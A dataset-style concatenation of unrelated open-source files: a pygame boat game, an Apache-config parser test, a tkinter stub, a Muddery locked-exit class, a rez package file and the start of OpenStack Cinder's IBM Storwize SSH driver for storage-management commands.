    global start_boats
    enemy_cannonballs = []
    player_cannonballs = []
    enemy_boats = []
    level_count = 0
    # Speed up the enemy fire timer every 4th level, down to a 500 ms floor.
    if level > 0 and level % 4 == 0 and timer > 500:
        timer -= 100
    if level == 0:
        make_boats(start_boats)
    else:
        make_boats(start_boats + level)
def check_collisions():
    """End the run when the player's boat sails off either screen edge."""
    global level
    global count
    global level_count
    if player.x > display_width-player.width or player.x < 0:
        message_display('You crashed!')
        time.sleep(1)
        reset_variables()
        level_count = 0
        start_screen()
def fire(boat, i):
    """Spawn a cannonball: above the player's bow when *boat* is the player,
    otherwise below the hull of enemy boat *i*."""
    if boat == player:
        shot = Cannonball(cannonball_img, player.x + 8, player.y - 8)
        player_cannonballs.append(shot)
    elif boat == enemy_boats[i]:
        shooter = enemy_boats[i]
        shot = Cannonball(cannonball_img, shooter.x + 8, shooter.y + shooter.height + 16)
        enemy_cannonballs.append(shot)
def game_loop():
    """Main gameplay loop: input handling, movement, firing, collisions,
    rendering and level progression."""
    global player
    global level
    global count
    global timer
    # Reserve the last user event id for the periodic "enemy fires" timer.
    enemy_event = pygame.NUMEVENTS - 1
    pygame.time.set_timer(enemy_event, timer)
    player_boat_x = (display_width * 0.5) - 16
    player_boat_y = display_height * 0.8
    player = Boat(boat_img, player_boat_x, player_boat_y)
    x_change = 0
    while True:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                exit_game()
            if event.type == pygame.KEYDOWN:
                # A/D steer, W fires.
                if event.key == pygame.K_a:
                    x_change = -5
                elif event.key == pygame.K_d:
                    x_change = 5
                elif event.key == pygame.K_w:
                    fire(player, 0)
            if event.type == pygame.KEYUP:
                if event.key == pygame.K_a or event.key == pygame.K_d:
                    x_change = 0
            if event.type == enemy_event:
                # Timer tick: a random surviving enemy boat fires.
                if enemy_boats:
                    boat = random.randrange(0, len(enemy_boats))
                    fire(enemy_boats[boat], boat)
        player_boat_x += x_change
        check_collisions()
        game_display.fill(light_blue)
        # Draw then advance every cannonball (player balls travel up,
        # enemy balls down); update() also resolves any hits.
        for cannonball in player_cannonballs:
            cannonball.cannonball_display()
            cannonball.update(-5)
        for cannonball in enemy_cannonballs:
            cannonball.cannonball_display()
            cannonball.update(5)
        for boat in enemy_boats:
            boat.boat_display()
        # All enemies destroyed -> advance to the next level.
        if len(enemy_boats) == 0:
            message_display('You beat Level {}!'.format(str(level+1)))
            time.sleep(1)
            level += 1
            ready_level()
            start_screen()
        level_and_score(level, count)
        player.boat_update(x_change)
        player.boat_display()
        pygame.display.update()
        clock.tick(60)
if __name__ == '__main__':
start_screen()
| [
"naburnham@zoho.com"
] | naburnham@zoho.com |
52fd9eee2ea92280eef3cda43ec700098fc1ddbe | 0145dbe97f3d34017d996430006accc04ed1929e | /parse_apache_configs/test/test_file_diff.py | 54b48976c23f7fb18cdba9e24f22d72dc846ef0f | [
"MIT",
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | daladim/parse_apache_configs | c2527585ef97dafef5ee9f9f88ede062b2be648f | 5f585c099095176ae4708c65593bef315d930033 | refs/heads/master | 2022-05-30T17:01:33.191882 | 2020-05-05T06:34:54 | 2020-05-05T06:34:54 | 258,106,644 | 0 | 0 | Apache-2.0 | 2020-04-23T05:47:42 | 2020-04-23T05:47:41 | null | UTF-8 | Python | false | false | 1,638 | py | import difflib
from parse_apache_configs import parse_config
import unittest
from pprint import pprint
from os.path import isfile,join
from os import listdir
class testFileDiff(unittest.TestCase):

    def test_file_diff(self):
        """
        Round-trip every config under ./test_conf_files through
        parse_config()/get_apache_config() and diff the output against the
        original file, ignoring spaces and tabs.  The regenerated text must
        match the source exactly.
        """
        conf_dir = "./test_conf_files"
        test_files = [f for f in listdir(conf_dir) if isfile(join(conf_dir, f))]
        for file_name in test_files:
            file_path = "./test_conf_files/" + file_name
            with open(file_path, "r") as apache_config:
                file_string = apache_config.read()
            pac = parse_config.ParseApacheConfig(file_path)
            conf_list = pac.parse_config()
            conf_string = pac.get_apache_config(conf_list)
            # Strip all spaces and tabs so only token content is compared.
            conf_string = conf_string.replace(" ", "").replace("\t", "")
            file_string = file_string.replace(" ", "").replace("\t", "")
            s = difflib.SequenceMatcher(None, conf_string, file_string)
            # Bug fix: real_quick_ratio() is only a length-based upper bound
            # on similarity, so any content change that preserved the length
            # passed the old assertion.  ratio() compares the actual text.
            self.assertTrue(s.ratio() == 1.0)

    def test_file_diff_after_add(self):
        """
        This method will add a few directives to the apache config
        then to a diff on it against the original file. The diff
        should return a ratio less than 1.
        """
        pass
| [
"miguel.cantu@rackspace.com"
] | miguel.cantu@rackspace.com |
99f0114229968dc89da64649302a272cb8b61dd7 | 19308c971669b903fd1ee9862948e482ab37ce56 | /open_window.py | 74ac07da4a769f11e7c9ef3afdd4005bad3c1154 | [
"MIT"
] | permissive | crazcalm/learn_tkinter_canvas | 9634716275061d56282c1062a9d58cdac5761869 | b798a6f2217a478e9222bb6eaa2afec3d28a2758 | refs/heads/master | 2021-01-03T04:33:25.134059 | 2020-03-02T01:07:28 | 2020-03-02T01:07:28 | 239,924,031 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 57 | py | import tkinter as tk
window = tk.Tk()
window.mainloop() | [
"crazcalm@gmail.com"
] | crazcalm@gmail.com |
12ffc04da6d5d1f0f1212995f33e58915d501bc0 | a964f0f3f93a84d5195042d3c1bb2288e8b62161 | /muddery/server/typeclasses/locked_exit.py | 0451335dae27a4647d7d453f79f9d35569d9f04e | [
"BSD-3-Clause"
] | permissive | nobodxbodon/muddery | 474433791b75d2f2130e6b758fb3126e2d56230b | 4b4c6c0dc5cc237a5df012a05ed260fad1a793a7 | refs/heads/master | 2023-06-19T19:28:39.252340 | 2021-07-14T15:07:47 | 2021-07-14T15:07:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,770 | py | """
Exits
Exits are connectors between Rooms. An exit always has a destination property
set and has a single command defined on itself with the same name as its key,
for allowing Characters to traverse the exit to its destination.
"""
from muddery.server.statements.statement_handler import STATEMENT_HANDLER
from muddery.server.utils.localized_strings_handler import _
from muddery.server.mappings.typeclass_set import TYPECLASS
class MudderyLockedExit(TYPECLASS("EXIT")):
    """
    Characters must unlock these exits to pass it.
    The view and commands of locked exits are different from unlocked exits.
    """
    typeclass_key = "LOCKED_EXIT"
    typeclass_name = _("Locked Exit", "typeclasses")
    model_name = "exit_locks"

    def after_data_loaded(self):
        """
        Cache the lock configuration from the loaded system data.
        """
        super(MudderyLockedExit, self).after_data_loaded()

        # Condition statement a character must match to unlock the exit.
        self.unlock_condition = getattr(self.system, "unlock_condition", "")
        # Display name of the unlock command (empty -> localized "Unlock").
        self.unlock_verb = getattr(self.system, "unlock_verb", "")
        # Description shown while the exit is still locked.
        self.locked_desc = getattr(self.system, "locked_desc", "")
        # Whether the exit unlocks by itself once the condition matches.
        self.auto_unlock = getattr(self.system, "auto_unlock", False)
        # Whether an unlock is permanent; if False the exit relocks on use.
        self.unlock_forever = getattr(self.system, "unlock_forever", True)

    def at_before_traverse(self, traversing_object):
        """
        Called just before an object uses this object to traverse to
        another object (i.e. this object is a type of Exit)

        Args:
            traversing_object (Object): The object traversing us.

        Notes:
            The target destination should normally be available as
            `self.destination`.

            If this method returns False/None, the traverse is cancelled
            before it is even started.
        """
        if not super(MudderyLockedExit, self).at_before_traverse(traversing_object):
            return False

        # Only can pass exits which have already been unlocked.
        if traversing_object.is_exit_unlocked(self.get_data_key()):
            if not self.unlock_forever:
                # lock the exit again
                traversing_object.lock_exit(self)
            return True

        if self.auto_unlock and self.can_unlock(traversing_object):
            # Can unlock the exit automatically.
            if self.unlock_forever:
                # Unlock it permanently; one-shot exits stay locked but
                # still allow this traversal.
                traversing_object.unlock_exit(self)
            return True

        # Still locked: show the exit's (locked) appearance instead.
        appearance = self.get_appearance(traversing_object)
        traversing_object.msg({"look_obj": appearance})
        return False

    def can_unlock(self, caller):
        """
        Whether *caller* currently satisfies the unlock condition.
        """
        # Only can unlock exits which match their conditions.
        return STATEMENT_HANDLER.match_condition(self.unlock_condition, caller, self)

    def get_appearance(self, caller):
        """
        This is a convenient hook for a 'look'
        command to call.
        """
        # Get name and description.
        if caller.is_exit_unlocked(self.get_data_key()):
            # If is unlocked, use common appearance.
            return super(MudderyLockedExit, self).get_appearance(caller)

        can_unlock = self.can_unlock(caller)

        if self.auto_unlock and can_unlock:
            if self.unlock_forever:
                # Automatically unlock the exit when a character looks at it.
                caller.unlock_exit(self)

            # If is unlocked, use common appearance.
            return super(MudderyLockedExit, self).get_appearance(caller)

        cmds = []
        if can_unlock:
            # show unlock command
            verb = self.unlock_verb
            if not verb:
                verb = _("Unlock")
            cmds = [{"name": verb, "cmd": "unlock_exit", "args": self.dbref}]

        info = {"dbref": self.dbref,
                "name": self.name,
                "desc": self.locked_desc,
                "cmds": cmds}
        return info

    def get_available_commands(self, caller):
        """
        This returns a list of available commands.

        "args" must be a string without ' and ", usually it is self.dbref.
        """
        if caller.is_exit_unlocked(self.get_data_key()):
            # If is unlocked, use common commands.
            return super(MudderyLockedExit, self).get_available_commands(caller)

        cmds = []
        # Consistency fix: reuse can_unlock() instead of duplicating the
        # STATEMENT_HANDLER.match_condition(...) call inline.
        if self.can_unlock(caller):
            # show unlock command
            verb = self.unlock_verb
            if not verb:
                verb = _("Unlock")
            # NOTE(review): get_appearance() emits cmd "unlock_exit" while
            # this method emits "unlock" -- confirm which command key the
            # client actually handles.
            cmds = [{"name": verb, "cmd": "unlock", "args": self.dbref}]
        return cmds
| [
"luyijun999@gmail.com"
] | luyijun999@gmail.com |
dd4fb7ea275ee365886a27cecfb16f952e6bafe3 | 87f50b69a3c4946c24c7ff32893c8ced99b73256 | /usdview/18.09/package.py | 2773af73d07098b971800dcc8da1134b35a35896 | [
"MIT"
] | permissive | UTS-AnimalLogicAcademy/open-source-rez-packages | d892f38d838754603405eef80bf3e77b2a727d0b | 809de83c9802b0166d8f88e0865612a75a4c032d | refs/heads/master | 2022-11-24T13:13:28.143401 | 2022-11-07T23:55:51 | 2022-11-07T23:55:51 | 117,476,450 | 66 | 8 | MIT | 2021-06-22T06:42:49 | 2018-01-14T23:42:11 | CMake | UTF-8 | Python | false | false | 182 | py | # -*- coding: utf-8 -*-
# Rez package definition for the usdview tool.
name = 'usdview'
version = '18.09'
# Packages resolved into the environment alongside usdview.
requires = [
    'pyside-1.2',
    'usd-18.09'
]
def commands():
    # Run by rez while configuring the environment; `env` is injected by
    # rez.  Points DEFAULT_USD at the scene file shipped with the package.
    env.DEFAULT_USD.set('{root}/bin/DefaultUSD.usda')
"daniel.flood-1@uts.edu.au"
] | daniel.flood-1@uts.edu.au |
75e67f9d2f99485e02e71e9d13c80edfe59d577a | 42c63d5f9c724c99ba93f77bdead51891fcf8623 | /OpenStack-Mitaka-src/cinder/cinder/volume/drivers/ibm/storwize_svc/storwize_svc_common.py | f5e43d96d19eda583d719b33f56058a3e20c740f | [
"Apache-2.0"
] | permissive | liyongle/openstack-mitaka | 115ae819d42ed9bf0922a8c0ab584fa99a3daf92 | 5ccd31c6c3b9aa68b9db1bdafcf1b029e8e37b33 | refs/heads/master | 2021-07-13T04:57:53.488114 | 2019-03-07T13:26:25 | 2019-03-07T13:26:25 | 174,311,782 | 0 | 1 | null | 2020-07-24T01:44:47 | 2019-03-07T09:18:55 | Python | UTF-8 | Python | false | false | 139,105 | py | # Copyright 2015 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import math
import paramiko
import random
import re
import string
import time
import unicodedata
from eventlet import greenthread
from oslo_concurrency import processutils
from oslo_config import cfg
from oslo_log import log as logging
from oslo_service import loopingcall
from oslo_utils import excutils
from oslo_utils import strutils
from oslo_utils import units
import six
from cinder import context
from cinder import exception
from cinder import ssh_utils
from cinder import utils as cinder_utils
from cinder.i18n import _, _LE, _LI, _LW
from cinder.objects import fields
from cinder.volume import driver
from cinder.volume.drivers.ibm.storwize_svc import (
replication as storwize_rep)
from cinder.volume.drivers.san import san
from cinder.volume import qos_specs
from cinder.volume import utils
from cinder.volume import volume_types
# Default polling interval (seconds) for wait loops.
INTERVAL_1_SEC = 1
# Default overall timeout (seconds) for wait loops.
DEFAULT_TIMEOUT = 15
LOG = logging.getLogger(__name__)
# Driver configuration options, registered with oslo.config below.
storwize_svc_opts = [
    cfg.ListOpt('storwize_svc_volpool_name',
                default=['volpool'],
                help='Comma separated list of storage system storage '
                     'pools for volumes.'),
    cfg.IntOpt('storwize_svc_vol_rsize',
               default=2,
               min=-1, max=100,
               help='Storage system space-efficiency parameter for volumes '
                    '(percentage)'),
    cfg.IntOpt('storwize_svc_vol_warning',
               default=0,
               min=-1, max=100,
               help='Storage system threshold for volume capacity warnings '
                    '(percentage)'),
    cfg.BoolOpt('storwize_svc_vol_autoexpand',
                default=True,
                help='Storage system autoexpand parameter for volumes '
                     '(True/False)'),
    cfg.IntOpt('storwize_svc_vol_grainsize',
               default=256,
               help='Storage system grain size parameter for volumes '
                    '(32/64/128/256)'),
    cfg.BoolOpt('storwize_svc_vol_compression',
                default=False,
                help='Storage system compression option for volumes'),
    cfg.BoolOpt('storwize_svc_vol_easytier',
                default=True,
                help='Enable Easy Tier for volumes'),
    cfg.IntOpt('storwize_svc_vol_iogrp',
               default=0,
               help='The I/O group in which to allocate volumes'),
    cfg.IntOpt('storwize_svc_flashcopy_timeout',
               default=120,
               min=1, max=600,
               help='Maximum number of seconds to wait for FlashCopy to be '
                    'prepared.'),
    cfg.BoolOpt('storwize_svc_multihostmap_enabled',
                default=True,
                help='This option no longer has any affect. It is deprecated '
                     'and will be removed in the next release.',
                deprecated_for_removal=True),
    cfg.BoolOpt('storwize_svc_allow_tenant_qos',
                default=False,
                help='Allow tenants to specify QOS on create'),
    cfg.StrOpt('storwize_svc_stretched_cluster_partner',
               default=None,
               help='If operating in stretched cluster mode, specify the '
                    'name of the pool in which mirrored copies are stored.'
                    'Example: "pool2"'),
    cfg.StrOpt('storwize_san_secondary_ip',
               default=None,
               help='Specifies secondary management IP or hostname to be '
                    'used if san_ip is invalid or becomes inaccessible.'),
    cfg.BoolOpt('storwize_svc_vol_nofmtdisk',
                default=False,
                help='Specifies that the volume not be formatted during '
                     'creation.'),
    cfg.IntOpt('storwize_svc_flashcopy_rate',
               default=50,
               min=1, max=100,
               help='Specifies the Storwize FlashCopy copy rate to be used '
                    'when creating a full volume copy. The default is rate '
                    'is 50, and the valid rates are 1-100.'),
]
CONF = cfg.CONF
CONF.register_opts(storwize_svc_opts)
class StorwizeSSH(object):
    """SSH interface to IBM Storwize family and SVC storage systems.

    Thin wrapper that builds 'svcinfo'/'svctask' CLI argument lists and
    executes them through the supplied SSH runner.  Query commands return
    parsed CLIResponse objects; action commands either assert that the
    CLI produced no output or extract the ID of the created object.
    """
    def __init__(self, run_ssh):
        # run_ssh: callable executing a command list, returns (out, err).
        self._ssh = run_ssh
    def _run_ssh(self, ssh_cmd):
        # Execute the command, converting execution failures into
        # VolumeBackendAPIException with command/stdout/stderr detail.
        try:
            return self._ssh(ssh_cmd)
        except processutils.ProcessExecutionError as e:
            msg = (_('CLI Exception output:\n command: %(cmd)s\n '
                     'stdout: %(out)s\n stderr: %(err)s.') %
                   {'cmd': ssh_cmd,
                    'out': e.stdout,
                    'err': e.stderr})
            LOG.error(msg)
            raise exception.VolumeBackendAPIException(data=msg)
    def run_ssh_info(self, ssh_cmd, delim='!', with_header=False):
        """Run an SSH command and return parsed output."""
        raw = self._run_ssh(ssh_cmd)
        return CLIResponse(raw, ssh_cmd=ssh_cmd, delim=delim,
                           with_header=with_header)
    def run_ssh_assert_no_output(self, ssh_cmd):
        """Run an SSH command and assert no output returned."""
        out, err = self._run_ssh(ssh_cmd)
        if len(out.strip()) != 0:
            msg = (_('Expected no output from CLI command %(cmd)s, '
                     'got %(out)s.') % {'cmd': ' '.join(ssh_cmd), 'out': out})
            LOG.error(msg)
            raise exception.VolumeBackendAPIException(data=msg)
    def run_ssh_check_created(self, ssh_cmd):
        """Run an SSH command and return the ID of the created object."""
        out, err = self._run_ssh(ssh_cmd)
        try:
            # The CLI reports e.g. "... [5], successfully created".
            match_obj = re.search(r'\[([0-9]+)\],? successfully created', out)
            return match_obj.group(1)
        except (AttributeError, IndexError):
            msg = (_('Failed to parse CLI output:\n command: %(cmd)s\n '
                     'stdout: %(out)s\n stderr: %(err)s.') %
                   {'cmd': ssh_cmd,
                    'out': out,
                    'err': err})
            LOG.error(msg)
            raise exception.VolumeBackendAPIException(data=msg)
    def lsnode(self, node_id=None):
        # With a node_id the CLI returns a single detailed record
        # (no header); without, a header row precedes the listing.
        with_header = True
        ssh_cmd = ['svcinfo', 'lsnode', '-delim', '!']
        if node_id:
            with_header = False
            ssh_cmd.append(node_id)
        return self.run_ssh_info(ssh_cmd, with_header=with_header)
    def lslicense(self):
        ssh_cmd = ['svcinfo', 'lslicense', '-delim', '!']
        return self.run_ssh_info(ssh_cmd)[0]
    def lsguicapabilities(self):
        ssh_cmd = ['svcinfo', 'lsguicapabilities', '-delim', '!']
        return self.run_ssh_info(ssh_cmd)[0]
    def lssystem(self):
        ssh_cmd = ['svcinfo', 'lssystem', '-delim', '!']
        return self.run_ssh_info(ssh_cmd)[0]
    def lsmdiskgrp(self, pool):
        ssh_cmd = ['svcinfo', 'lsmdiskgrp', '-bytes', '-delim', '!',
                   '"%s"' % pool]
        return self.run_ssh_info(ssh_cmd)[0]
    def lsiogrp(self):
        ssh_cmd = ['svcinfo', 'lsiogrp', '-delim', '!']
        return self.run_ssh_info(ssh_cmd, with_header=True)
    def lsportip(self):
        ssh_cmd = ['svcinfo', 'lsportip', '-delim', '!']
        return self.run_ssh_info(ssh_cmd, with_header=True)
    @staticmethod
    def _create_port_arg(port_type, port_name):
        # iSCSI initiators are passed via -iscsiname, FC ports via -hbawwpn.
        if port_type == 'initiator':
            port = ['-iscsiname']
        else:
            port = ['-hbawwpn']
        port.append(port_name)
        return port
    def mkhost(self, host_name, port_type, port_name):
        port = self._create_port_arg(port_type, port_name)
        ssh_cmd = ['svctask', 'mkhost', '-force'] + port
        ssh_cmd += ['-name', '"%s"' % host_name]
        return self.run_ssh_check_created(ssh_cmd)
    def addhostport(self, host, port_type, port_name):
        port = self._create_port_arg(port_type, port_name)
        ssh_cmd = ['svctask', 'addhostport', '-force'] + port + ['"%s"' % host]
        self.run_ssh_assert_no_output(ssh_cmd)
    def lshost(self, host=None):
        # As with lsnode: detail query for one host has no header row.
        with_header = True
        ssh_cmd = ['svcinfo', 'lshost', '-delim', '!']
        if host:
            with_header = False
            ssh_cmd.append('"%s"' % host)
        return self.run_ssh_info(ssh_cmd, with_header=with_header)
    def add_chap_secret(self, secret, host):
        ssh_cmd = ['svctask', 'chhost', '-chapsecret', secret, '"%s"' % host]
        self.run_ssh_assert_no_output(ssh_cmd)
    def lsiscsiauth(self):
        ssh_cmd = ['svcinfo', 'lsiscsiauth', '-delim', '!']
        return self.run_ssh_info(ssh_cmd, with_header=True)
    def lsfabric(self, wwpn=None, host=None):
        # Exactly one of wwpn/host must be supplied to scope the query.
        ssh_cmd = ['svcinfo', 'lsfabric', '-delim', '!']
        if wwpn:
            ssh_cmd.extend(['-wwpn', wwpn])
        elif host:
            ssh_cmd.extend(['-host', '"%s"' % host])
        else:
            msg = (_('Must pass wwpn or host to lsfabric.'))
            LOG.error(msg)
            raise exception.VolumeDriverException(message=msg)
        return self.run_ssh_info(ssh_cmd, with_header=True)
    def mkvdiskhostmap(self, host, vdisk, lun, multihostmap):
        """Map vdisk to host.

        If vdisk already mapped and multihostmap is True, use the force flag.
        """
        ssh_cmd = ['svctask', 'mkvdiskhostmap', '-host', '"%s"' % host,
                   '-scsi', lun, vdisk]
        if multihostmap:
            ssh_cmd.insert(ssh_cmd.index('mkvdiskhostmap') + 1, '-force')
        try:
            self.run_ssh_check_created(ssh_cmd)
        except Exception as ex:
            # CMMVC6071E: vdisk already mapped to a host.  Report it as a
            # multi-host-mapping refusal when multihostmap is disabled.
            # NOTE(review): relies on ex.message, which only exists on
            # Python 2 exceptions — confirm before porting to Python 3.
            if (not multihostmap and hasattr(ex, 'message') and
                    'CMMVC6071E' in ex.message):
                LOG.error(_LE('storwize_svc_multihostmap_enabled is set '
                              'to False, not allowing multi host mapping.'))
                raise exception.VolumeDriverException(
                    message=_('CMMVC6071E The VDisk-to-host mapping was not '
                              'created because the VDisk is already mapped '
                              'to a host.\n"'))
            with excutils.save_and_reraise_exception():
                LOG.error(_LE('Error mapping VDisk-to-host'))
    def mkrcrelationship(self, master, aux, system, name, asyncmirror):
        ssh_cmd = ['svctask', 'mkrcrelationship', '-master', master,
                   '-aux', aux, '-cluster', system, '-name', name]
        if asyncmirror:
            ssh_cmd.append('-global')
        return self.run_ssh_check_created(ssh_cmd)
    def rmrcrelationship(self, relationship):
        ssh_cmd = ['svctask', 'rmrcrelationship', relationship]
        self.run_ssh_assert_no_output(ssh_cmd)
    def switchrelationship(self, relationship, aux=True):
        primary = 'aux' if aux else 'master'
        ssh_cmd = ['svctask', 'switchrcrelationship', '-primary',
                   primary, relationship]
        self.run_ssh_assert_no_output(ssh_cmd)
    def startrcrelationship(self, rc_rel, primary=None):
        ssh_cmd = ['svctask', 'startrcrelationship', '-force']
        if primary:
            ssh_cmd.extend(['-primary', primary])
        ssh_cmd.append(rc_rel)
        self.run_ssh_assert_no_output(ssh_cmd)
    def stoprcrelationship(self, relationship, access=False):
        ssh_cmd = ['svctask', 'stoprcrelationship']
        if access:
            ssh_cmd.append('-access')
        ssh_cmd.append(relationship)
        self.run_ssh_assert_no_output(ssh_cmd)
    def lsrcrelationship(self, volume_name):
        key_value = 'name=%s' % volume_name
        ssh_cmd = ['svcinfo', 'lsrcrelationship', '-filtervalue',
                   key_value, '-delim', '!']
        return self.run_ssh_info(ssh_cmd, with_header=True)
    def lspartnership(self, system_name):
        key_value = 'name=%s' % system_name
        ssh_cmd = ['svcinfo', 'lspartnership', '-filtervalue',
                   key_value, '-delim', '!']
        return self.run_ssh_info(ssh_cmd, with_header=True)
    def lspartnershipcandidate(self):
        ssh_cmd = ['svcinfo', 'lspartnershipcandidate', '-delim', '!']
        return self.run_ssh_info(ssh_cmd, with_header=True)
    def mkippartnership(self, ip_v4, bandwith):
        ssh_cmd = ['svctask', 'mkippartnership', '-type', 'ipv4',
                   '-clusterip', ip_v4, '-linkbandwidthmbits',
                   six.text_type(bandwith)]
        return self.run_ssh_assert_no_output(ssh_cmd)
    def mkfcpartnership(self, system_name, bandwith):
        ssh_cmd = ['svctask', 'mkfcpartnership', '-linkbandwidthmbits',
                   six.text_type(bandwith), system_name]
        return self.run_ssh_assert_no_output(ssh_cmd)
    def startpartnership(self, partnership_id):
        ssh_cmd = ['svctask', 'chpartnership', '-start', partnership_id]
        return self.run_ssh_assert_no_output(ssh_cmd)
    def rmvdiskhostmap(self, host, vdisk):
        ssh_cmd = ['svctask', 'rmvdiskhostmap', '-host', '"%s"' % host, vdisk]
        self.run_ssh_assert_no_output(ssh_cmd)
    def lsvdiskhostmap(self, vdisk):
        ssh_cmd = ['svcinfo', 'lsvdiskhostmap', '-delim', '!', vdisk]
        return self.run_ssh_info(ssh_cmd, with_header=True)
    def lshostvdiskmap(self, host):
        ssh_cmd = ['svcinfo', 'lshostvdiskmap', '-delim', '!', '"%s"' % host]
        return self.run_ssh_info(ssh_cmd, with_header=True)
    def rmhost(self, host):
        ssh_cmd = ['svctask', 'rmhost', '"%s"' % host]
        self.run_ssh_assert_no_output(ssh_cmd)
    def mkvdisk(self, name, size, units, pool, opts, params):
        ssh_cmd = ['svctask', 'mkvdisk', '-name', name, '-mdiskgrp',
                   '"%s"' % pool, '-iogrp', six.text_type(opts['iogrp']),
                   '-size', size, '-unit', units] + params
        return self.run_ssh_check_created(ssh_cmd)
    def rmvdisk(self, vdisk, force=True):
        ssh_cmd = ['svctask', 'rmvdisk']
        if force:
            ssh_cmd += ['-force']
        ssh_cmd += [vdisk]
        self.run_ssh_assert_no_output(ssh_cmd)
    def lsvdisk(self, vdisk):
        """Return vdisk attributes or None if it doesn't exist."""
        ssh_cmd = ['svcinfo', 'lsvdisk', '-bytes', '-delim', '!', vdisk]
        out, err = self._ssh(ssh_cmd, check_exit_code=False)
        if not len(err):
            return CLIResponse((out, err), ssh_cmd=ssh_cmd, delim='!',
                               with_header=False)[0]
        # CMMVC5754E: the object does not exist — not an error here.
        if err.startswith('CMMVC5754E'):
            return None
        msg = (_('CLI Exception output:\n command: %(cmd)s\n '
                 'stdout: %(out)s\n stderr: %(err)s.') %
               {'cmd': ssh_cmd,
                'out': out,
                'err': err})
        LOG.error(msg)
        raise exception.VolumeBackendAPIException(data=msg)
    def lsvdisks_from_filter(self, filter_name, value):
        """Performs an lsvdisk command, filtering the results as specified.

        Returns an iterable for all matching vdisks.
        """
        ssh_cmd = ['svcinfo', 'lsvdisk', '-bytes', '-delim', '!',
                   '-filtervalue', '%s=%s' % (filter_name, value)]
        return self.run_ssh_info(ssh_cmd, with_header=True)
    def chvdisk(self, vdisk, params):
        ssh_cmd = ['svctask', 'chvdisk'] + params + [vdisk]
        self.run_ssh_assert_no_output(ssh_cmd)
    def movevdisk(self, vdisk, iogrp):
        ssh_cmd = ['svctask', 'movevdisk', '-iogrp', iogrp, vdisk]
        self.run_ssh_assert_no_output(ssh_cmd)
    def expandvdisksize(self, vdisk, amount):
        ssh_cmd = (
            ['svctask', 'expandvdisksize', '-size', six.text_type(amount),
             '-unit', 'gb', vdisk])
        self.run_ssh_assert_no_output(ssh_cmd)
    def mkfcmap(self, source, target, full_copy, copy_rate, consistgrp=None):
        # A copy rate of 0 requests no background copy (snapshot-style
        # mapping); otherwise the caller-provided rate is used.
        ssh_cmd = ['svctask', 'mkfcmap', '-source', source, '-target',
                   target, '-autodelete']
        if not full_copy:
            ssh_cmd.extend(['-copyrate', '0'])
        else:
            ssh_cmd.extend(['-copyrate', six.text_type(copy_rate)])
        if consistgrp:
            ssh_cmd.extend(['-consistgrp', consistgrp])
        out, err = self._ssh(ssh_cmd, check_exit_code=False)
        if 'successfully created' not in out:
            msg = (_('CLI Exception output:\n command: %(cmd)s\n '
                     'stdout: %(out)s\n stderr: %(err)s.') %
                   {'cmd': ssh_cmd,
                    'out': out,
                    'err': err})
            LOG.error(msg)
            raise exception.VolumeBackendAPIException(data=msg)
        try:
            # Extract the new mapping's numeric ID from the CLI message.
            match_obj = re.search(r'FlashCopy Mapping, id \[([0-9]+)\], '
                                  'successfully created', out)
            fc_map_id = match_obj.group(1)
        except (AttributeError, IndexError):
            msg = (_('Failed to parse CLI output:\n command: %(cmd)s\n '
                     'stdout: %(out)s\n stderr: %(err)s.') %
                   {'cmd': ssh_cmd,
                    'out': out,
                    'err': err})
            LOG.error(msg)
            raise exception.VolumeBackendAPIException(data=msg)
        return fc_map_id
    def prestartfcmap(self, fc_map_id):
        ssh_cmd = ['svctask', 'prestartfcmap', fc_map_id]
        self.run_ssh_assert_no_output(ssh_cmd)
    def startfcmap(self, fc_map_id):
        ssh_cmd = ['svctask', 'startfcmap', fc_map_id]
        self.run_ssh_assert_no_output(ssh_cmd)
    def prestartfcconsistgrp(self, fc_consist_group):
        ssh_cmd = ['svctask', 'prestartfcconsistgrp', fc_consist_group]
        self.run_ssh_assert_no_output(ssh_cmd)
    def startfcconsistgrp(self, fc_consist_group):
        ssh_cmd = ['svctask', 'startfcconsistgrp', fc_consist_group]
        self.run_ssh_assert_no_output(ssh_cmd)
    def stopfcconsistgrp(self, fc_consist_group):
        ssh_cmd = ['svctask', 'stopfcconsistgrp', fc_consist_group]
        self.run_ssh_assert_no_output(ssh_cmd)
    def chfcmap(self, fc_map_id, copyrate='50', autodel='on'):
        ssh_cmd = ['svctask', 'chfcmap', '-copyrate', copyrate,
                   '-autodelete', autodel, fc_map_id]
        self.run_ssh_assert_no_output(ssh_cmd)
    def stopfcmap(self, fc_map_id):
        ssh_cmd = ['svctask', 'stopfcmap', fc_map_id]
        self.run_ssh_assert_no_output(ssh_cmd)
    def rmfcmap(self, fc_map_id):
        ssh_cmd = ['svctask', 'rmfcmap', '-force', fc_map_id]
        self.run_ssh_assert_no_output(ssh_cmd)
    def lsvdiskfcmappings(self, vdisk):
        ssh_cmd = ['svcinfo', 'lsvdiskfcmappings', '-delim', '!', vdisk]
        return self.run_ssh_info(ssh_cmd, with_header=True)
    def lsfcmap(self, fc_map_id):
        ssh_cmd = ['svcinfo', 'lsfcmap', '-filtervalue',
                   'id=%s' % fc_map_id, '-delim', '!']
        return self.run_ssh_info(ssh_cmd, with_header=True)
    def lsfcconsistgrp(self, fc_consistgrp):
        ssh_cmd = ['svcinfo', 'lsfcconsistgrp', '-delim', '!', fc_consistgrp]
        out, err = self._ssh(ssh_cmd)
        return CLIResponse((out, err), ssh_cmd=ssh_cmd, delim='!',
                           with_header=False)
    def mkfcconsistgrp(self, fc_consist_group):
        ssh_cmd = ['svctask', 'mkfcconsistgrp', '-name', fc_consist_group]
        return self.run_ssh_check_created(ssh_cmd)
    def rmfcconsistgrp(self, fc_consist_group):
        ssh_cmd = ['svctask', 'rmfcconsistgrp', '-force', fc_consist_group]
        return self.run_ssh_assert_no_output(ssh_cmd)
    def addvdiskcopy(self, vdisk, dest_pool, params):
